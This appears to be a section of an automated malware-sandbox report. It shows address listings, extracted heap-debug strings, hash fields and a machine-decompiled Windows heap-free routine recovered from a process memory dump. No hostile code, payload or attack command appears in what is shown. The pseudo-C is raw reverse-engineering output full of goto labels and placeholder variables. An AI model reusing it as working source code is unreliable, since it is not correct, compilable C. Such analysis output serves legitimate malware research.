                                      0x01a3486f
                                      0x01a347e7
                                      0x01a347e7
                                      0x00000000
                                      0x01a347ec
                                      0x01a347aa
                                      0x01a347b0
                                      0x01a347b4
                                      0x01a347d3
                                      0x01a347d8
                                      0x01a347b6
                                      0x01a347cb
                                      0x01a347d0
                                      0x01a347de
                                      0x01a347df
                                      0x01a347e2
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x01a3476f
                                      0x01a3476f
                                      0x01a34778
                                      0x01a34785
                                      0x01a34787
                                      0x01a3478c
                                      0x01a3478e
                                      0x00000000
                                      0x00000000
                                      0x01a34790
                                      0x01a34792
                                      0x01a34794
                                      0x00000000
                                      0x00000000
                                      0x01a34796
                                      0x01a34799
                                      0x00000000
                                      0x01a34799
                                      0x00000000
                                      0x01a345c3
                                      0x01a345c3
                                      0x01a345c7
                                      0x01a345c7
                                      0x01a345ca
                                      0x01a345cf
                                      0x01a345d3
                                      0x01a345df
                                      0x01a345e4
                                      0x01a345e6
                                      0x01a345e8
                                      0x01a345ed
                                      0x01a345ed
                                      0x01a345f2
                                      0x01a345f2
                                      0x01a345f7
                                      0x01a345fc
                                      0x01a34602
                                      0x01a34606
                                      0x01a34609
                                      0x01a3460f
                                      0x01a346de
                                      0x01a346e3
                                      0x01a346e5
                                      0x01a346ec
                                      0x01a346ee
                                      0x01a346f6
                                      0x01a346f6
                                      0x01a346f6
                                      0x01a346f6
                                      0x01a346ec
                                      0x01a34615
                                      0x01a34615
                                      0x01a3461d
                                      0x01a3462e
                                      0x01a3462e
                                      0x01a3461d
                                      0x01a3460f
                                      0x01a34609
                                      0x01a346fd
                                      0x00000000
                                      0x00000000
                                      0x01a34710
                                      0x01a3471a
                                      0x01a34720
                                      0x01a34720
                                      0x01a34722
                                      0x01a3472c
                                      0x00000000
                                      0x01a3472e
                                      0x01a3472e
                                      0x00000000
                                      0x01a3472e
                                      0x01a3472c
                                      0x01a34738
                                      0x01a3473c
                                      0x01a3474b
                                      0x01a34751
                                      0x01a34751
                                      0x00000000
                                      0x01a3473c
                                      0x01a348f4
                                      0x01a348f4
                                      0x00000000
                                      0x01a348f4

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                      • API String ID: 0-1357697941
                                      • Opcode ID: 981a2d2a4921d098ee6880250e2a4211555eb85ad816bb1cdad827780b40f9ec
                                      • Instruction ID: b4943f98fd0c04651f7db231ba6f74fefe73743759c81ea4da42ee5beeeae64d
                                      • Opcode Fuzzy Hash: 981a2d2a4921d098ee6880250e2a4211555eb85ad816bb1cdad827780b40f9ec
                                      • Instruction Fuzzy Hash: 68F12235A00646DFDB26CF69C484BAAFBF5FFC9304F08806AF54A97641D734A985CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0199A309, Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 72%
                                      			E0199A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x1a68a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E0199A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E0199DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E01979373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E0197A9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x1a68748 - 1;
						if( *0x1a68748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E0197B150();
								} else {
									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E0197B150();
								__eflags =  *0x1a67bc8;
								if( *0x1a67bc8 == 0) {
									__eflags = 1;
									E01A32073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x1a68748 - 1;
							if( *0x1a68748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E019A174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E01997D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E01A314FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E01979373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E01979819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x1a68748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E0197B150();
											} else {
												E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E0197B150();
											_pop(_t491);
											__eflags =  *0x1a67bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01A32073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E01A3A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E0199A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E01997D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E01997D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E01A31411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E01997D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E01997D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x1a68748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E0197B150();
							} else {
								E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E0197B150();
							__eflags =  *0x1a67bc8;
							if( *0x1a67bc8 == 0) {
								__eflags = 0;
								E01A32073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x1a68748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E0197B150();
												} else {
													E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E0197B150();
												__eflags =  *0x1a67bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01A32073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E01A3A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E0199A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E0199B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E0199A830(_t553, _v64, _v24);
								_t286 = E01997D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E01997D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01A31411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E01997D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E01997D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01A31411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E019A174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E0199B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E01997D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E01A314FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E019999BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E0199A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E019AABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                      0x0199a309
                                      0x0199a316
                                      0x0199a319
                                      0x0199a31d
                                      0x0199a32d
                                      0x0199a331
                                      0x019e1e0d
                                      0x019e1e10
                                      0x0199a3cb
                                      0x0199a3cb
                                      0x0199a3bd
                                      0x0199a3c3
                                      0x0199a3c3
                                      0x0199a33a
                                      0x019e1e17
                                      0x019e1e1b
                                      0x019e1e1d
                                      0x019e1e2f
                                      0x019e1e34
                                      0x019e1e36
                                      0x019e1e3c
                                      0x019e1e3c
                                      0x019e1e3c
                                      0x019e1e3c
                                      0x019e1e36
                                      0x019e1e42
                                      0x019e1e45
                                      0x019e1e47
                                      0x0199a3f8
                                      0x0199a3f8
                                      0x0199a3fb
                                      0x0199a3fd
                                      0x019e1e50
                                      0x0199a403
                                      0x0199a411
                                      0x0199a411
                                      0x0199a411
                                      0x0199a41e
                                      0x0199a420
                                      0x0199a424
                                      0x0199a427
                                      0x0199a7c9
                                      0x0199a7cd
                                      0x0199a7d2
                                      0x0199a7d9
                                      0x0199a7e0
                                      0x0199a7e3
                                      0x0199a7ed
                                      0x0199a7f3
                                      0x0199a7f9
                                      0x0199a7ff
                                      0x0199a802
                                      0x0199a807
                                      0x0199a809
                                      0x0199a809
                                      0x0199a809
                                      0x0199a80f
                                      0x0199a80f
                                      0x0199a812
                                      0x0199a81c
                                      0x0199a821
                                      0x0199a824
                                      0x0199a42d
                                      0x0199a42d
                                      0x0199a42d
                                      0x0199a42d
                                      0x0199a42d
                                      0x0199a436
                                      0x0199a43a
                                      0x0199a609
                                      0x0199a60d
                                      0x0199a612
                                      0x0199a616
                                      0x0199a61a
                                      0x019e1e57
                                      0x019e1e59
                                      0x00000000
                                      0x00000000
                                      0x019e1e5f
                                      0x0199a620
                                      0x0199a627
                                      0x019e1e64
                                      0x019e1e66
                                      0x019e1e6c
                                      0x019e1e72
                                      0x019e1e76
                                      0x019e1e95
                                      0x019e1e9a
                                      0x019e1e78
                                      0x019e1e8d
                                      0x019e1e92
                                      0x019e1ea0
                                      0x019e1ea5
                                      0x019e1eaa
                                      0x019e1eb2
                                      0x019e1eb6
                                      0x019e1eb9
                                      0x019e1eb9
                                      0x019e1ebe
                                      0x019e1ec2
                                      0x019e1ec2
                                      0x019e1e66
                                      0x0199a62d
                                      0x0199a633
                                      0x0199a636
                                      0x0199a63a
                                      0x0199a63c
                                      0x0199a640
                                      0x0199a642
                                      0x0199a644
                                      0x0199a644
                                      0x0199a644
                                      0x0199a64d
                                      0x0199a64d
                                      0x0199a651
                                      0x0199a655
                                      0x019e1eca
                                      0x019e1ed1
                                      0x00000000
                                      0x00000000
                                      0x019e1ed7
                                      0x00000000
                                      0x0199a65b
                                      0x0199a669
                                      0x0199a66e
                                      0x0199a670
                                      0x00000000
                                      0x00000000
                                      0x0199a676
                                      0x0199a67b
                                      0x0199a680
                                      0x0199a682
                                      0x019e1f1a
                                      0x0199a688
                                      0x0199a688
                                      0x0199a688
                                      0x0199a68a
                                      0x0199a68d
                                      0x019e1f24
                                      0x019e1f2a
                                      0x019e1f31
                                      0x019e1f43
                                      0x019e1f43
                                      0x019e1f31
                                      0x0199a693
                                      0x0199a697
                                      0x0199a69d
                                      0x0199a6a0
                                      0x0199a6a6
                                      0x0199a6a8
                                      0x0199a6a8
                                      0x0199a6a8
                                      0x0199a6a8
                                      0x0199a6b2
                                      0x0199a6b7
                                      0x0199a6c1
                                      0x0199a6c6
                                      0x0199a6d2
                                      0x0199a6d9
                                      0x0199a6e3
                                      0x0199a6e6
                                      0x0199a6eb
                                      0x0199a6ed
                                      0x0199a6ed
                                      0x0199a6ed
                                      0x0199a6ed
                                      0x0199a6f3
                                      0x0199a6f8
                                      0x0199a702
                                      0x0199a70a
                                      0x0199a70e
                                      0x0199a71a
                                      0x0199a71e
                                      0x019e1fcb
                                      0x019e1fcf
                                      0x019e1fdd
                                      0x019e1fe3
                                      0x019e1fe3
                                      0x0199a724
                                      0x0199a728
                                      0x0199a72a
                                      0x0199a72d
                                      0x0199a737
                                      0x0199a73a
                                      0x0199a73c
                                      0x0199a742
                                      0x0199a748
                                      0x019e1f4d
                                      0x019e1f50
                                      0x019e1f56
                                      0x019e1f5c
                                      0x019e1f5f
                                      0x019e1f7e
                                      0x019e1f83
                                      0x019e1f61
                                      0x019e1f76
                                      0x019e1f7b
                                      0x019e1f89
                                      0x019e1f8e
                                      0x019e1f93
                                      0x019e1f94
                                      0x019e1f9a
                                      0x019e1f9c
                                      0x019e1f9e
                                      0x019e1fa1
                                      0x019e1fa1
                                      0x019e1fa6
                                      0x019e1fa6
                                      0x019e1f50
                                      0x0199a74e
                                      0x0199a751
                                      0x0199a754
                                      0x0199a75d
                                      0x0199a75e
                                      0x0199a762
                                      0x0199a767
                                      0x019e1faf
                                      0x019e1fb0
                                      0x019e1fb9
                                      0x019e1fbe
                                      0x019e1fc2
                                      0x019e1fc2
                                      0x0199a76d
                                      0x0199a76d
                                      0x0199a775
                                      0x0199a778
                                      0x0199a77d
                                      0x0199a77d
                                      0x0199a71e
                                      0x0199a782
                                      0x0199a787
                                      0x0199a789
                                      0x019e1ff3
                                      0x0199a78f
                                      0x0199a78f
                                      0x0199a78f
                                      0x0199a791
                                      0x0199a794
                                      0x019e1ffd
                                      0x019e2006
                                      0x019e200c
                                      0x019e2017
                                      0x019e2019
                                      0x019e2024
                                      0x019e2024
                                      0x019e2024
                                      0x019e2047
                                      0x019e2047
                                      0x019e200c
                                      0x0199a79a
                                      0x0199a79f
                                      0x0199a7a4
                                      0x0199a7a9
                                      0x0199a7ab
                                      0x019e205a
                                      0x0199a7b1
                                      0x0199a7b1
                                      0x0199a7b1
                                      0x0199a7b3
                                      0x0199a7b6
                                      0x00000000
                                      0x0199a7bc
                                      0x019e2066
                                      0x019e2068
                                      0x019e2073
                                      0x019e2073
                                      0x019e2073
                                      0x019e2078
                                      0x019e2079
                                      0x019e207d
                                      0x00000000
                                      0x019e207d
                                      0x0199a7b6
                                      0x0199a440
                                      0x0199a440
                                      0x0199a440
                                      0x0199a446
                                      0x0199a44c
                                      0x0199a44f
                                      0x0199a453
                                      0x0199a455
                                      0x019e20b3
                                      0x019e20b9
                                      0x019e20b9
                                      0x0199a45d
                                      0x0199a460
                                      0x0199a464
                                      0x0199a466
                                      0x0199a46b
                                      0x0199a46f
                                      0x0199a471
                                      0x0199a471
                                      0x0199a471
                                      0x0199a474
                                      0x0199a479
                                      0x0199a47d
                                      0x0199a47f
                                      0x019e2229
                                      0x019e222f
                                      0x0199a3c8
                                      0x0199a3c8
                                      0x0199a3ca
                                      0x0199a3ca
                                      0x00000000
                                      0x0199a3ca
                                      0x019e2235
                                      0x019e223a
                                      0x019e223a
                                      0x00000000
                                      0x00000000
                                      0x019e2240
                                      0x019e2246
                                      0x019e224a
                                      0x019e2269
                                      0x019e226e
                                      0x019e224c
                                      0x019e2261
                                      0x019e2266
                                      0x019e2274
                                      0x019e2279
                                      0x019e227e
                                      0x019e2286
                                      0x019e2288
                                      0x019e228d
                                      0x019e228d
                                      0x019e2292
                                      0x019e2292
                                      0x019e2295
                                      0x019e2295
                                      0x00000000
                                      0x019e2295
                                      0x0199a485
                                      0x0199a489
                                      0x0199a48b
                                      0x0199a48f
                                      0x0199a493
                                      0x0199a497
                                      0x0199a49b
                                      0x0199a4bb
                                      0x0199a4bb
                                      0x0199a4bd
                                      0x0199a4ff
                                      0x0199a4ff
                                      0x0199a501
                                      0x0199a505
                                      0x0199a50f
                                      0x0199a517
                                      0x0199a51b
                                      0x0199a527
                                      0x0199a52b
                                      0x019e2182
                                      0x019e2185
                                      0x019e2193
                                      0x019e2199
                                      0x019e2199
                                      0x0199a531
                                      0x0199a535
                                      0x0199a538
                                      0x0199a548
                                      0x0199a54b
                                      0x0199a54d
